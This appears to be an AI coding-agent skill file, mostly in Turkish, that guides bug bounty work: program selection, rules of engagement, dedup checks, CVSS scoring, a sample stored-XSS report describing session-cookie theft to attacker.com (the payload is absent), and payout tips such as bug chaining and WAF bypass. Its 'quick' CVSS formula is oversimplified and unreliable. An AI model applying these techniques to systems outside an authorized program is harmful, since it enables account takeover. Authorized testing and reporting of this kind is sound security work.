--- name: pentest-bugbounty description: Bug bounty methodology — HackerOne/Bugcrowd/Intigriti, deduplication, rapor yazimi, severity scoring, payout maksimizasyonu advisory. Triggers on bug bounty, HackerOne, Bugcrowd, Intigriti, H1, BB, dedup, severity, CVSS scoring, bug report writing, triage. license: MIT compatibility: Works with Claude Code allowed-tools: Read Write Edit Bash Grep metadata: author: badi badi-version: ">=1.24.0" category: pentest scope: advisory inspired-by: 0xSteph/pentest-ai-agents bug-bounty --- # pentest-bugbounty Bug bounty avlama disiplini — sadece yetkili programlar, ROE'ye sadakat, dedupe, kaliteli rapor. ## Triggers - "H1 raporu yazalim" - "Bugcrowd submission" - "CVSS skoru hesapla" - "dedup nasil yapilir" - "bounty rapor sablonu" ## Program Secimi Kriterleri | Faktor | Etki | |--------|------| | Scope genisligi (*.target.com vs sadece app) | Saldiri yuzeyi | | Bounty range (min-max) | ROI | | Response SLA (gun cinsinden) | Sabir | | Disclosure policy (public/private) | Portfolio buyumesi | | Safe Harbor (yasal koruma) | Risk | | Researcher rating gerekli mi (private prog) | Erisilebilirlik | **Onerilen baslangic**: VDP (vulnerability disclosure program) -> public bounty -> private invitation. ## Ne YAPMAYIN (Program Ihlali) - Scope disi varlik test (her zaman ban + yasal risk) - Production data exfil > kanit eshiti - Otomatik scan vendor onaylamadan - DoS / load test - Sosyal muhendislik calisanlara (cogunlukla yasak) - Brute force (cogunlukla yasak) - Public disclosure musteri onayindan once ## Dedup Stratejisi Submission'dan once: ```bash # H1 hacktivity curl 'https://hackerone.com//hacktivity' | jq '.results[] | select(.title | contains(""))' # Bugcrowd public submissions # Program sayfasinda search ``` Eger ayni zafiyet tipi + ayni endpoint -> **duplicate riski**, baska program dene. ## CVSS 3.1 Hizli Hesap ``` Base = Impact + Exploitability Impact (CIA): C/I/A: None=0, Low=0.22, High=0.56 Exploitability: AV: Network=0.85, Adjacent=0.62, Local=0.55, Physical=0.2 AC: Low=0.77, High=0.44 PR: None=0.85, Low=0.62, High=0.27 UI: None=0.85, Required=0.62 ``` Web exploit ornegi: - SQLi (authenticated, network, low complexity, low priv, no UI, high CIA) - AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = **8.8 (HIGH)** ## Rapor Sablonu (H1 / Bugcrowd ortak) ```markdown ## Title [CRITICAL] Stored XSS in admin panel allows session hijack of all admins ## Severity CVSS 3.1: 9.0 (CRITICAL) Vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N ## Summary Authenticated low-priv user can inject JS into the comment field that executes in admin browser when viewing dashboard. Session token is exfiltrated to attacker-controlled domain. ## Steps to Reproduce 1. Login as low-privilege user (user@example.com / Test123!) 2. Navigate to /comments 3. Submit comment body: `` 4. As admin, navigate to /admin/comments 5. Observe outbound request to attacker.com containing admin session cookie ## Impact - Full admin compromise (session hijack) - Persistent payload (stored DB) - 1-click via existing admin workflow (no extra interaction) ## Proof of Concept [screenshot1.png] — comment submission [screenshot2.png] — admin browser request [burp-export.har] — full HAR file ## Suggested Fix - Server-side sanitize comment body (DOMPurify on save, not on render) - CSP: `default-src 'self'; img-src 'self' data:` - Cookie: `HttpOnly` + `Secure` + `SameSite=Strict` ## Additional Context - Affected version: 4.2.1 (production as of 2026-05-15) - Tested on: Chrome 119, Firefox 120 - No public PoC, no CVE assigned ``` ## Triage Karsiti Hazirlik Programa report'tan sonra triagecinin atip sorusabilecekleri: | Soru | Hazirlikli Olun | |------|-----------------| | "Reproduce edemiyoruz" | Video kayit ekle, browser/OS belirt | | "User input limit yok zaten" | Real impact (admin session) demonstrasyonu | | "Bu duplicate, sok N sundu" | Talep ettiginiz farkli endpoint / dedup linki | | "Self-XSS sayariz" | Multi-user etkisini kanit | ## Bounty Maksimizasyon - **Chain bug**: Low + Low + Med -> Critical chain (premium payout) - **Out-of-band**: DNS, email, time-based POC (zor reproduce -> kalite puani) - **Detection bypass**: WAF / CSP bypass kanit - **Multi-domain impact**: Birden cok asset etkilenirse explicit ekle ## Out-of-Scope - Otomatik dedup tool composer'i (insan kararı) - Sosyal muhendislik calisanlara - Yasakli teknik kullanma (DoS, brute force)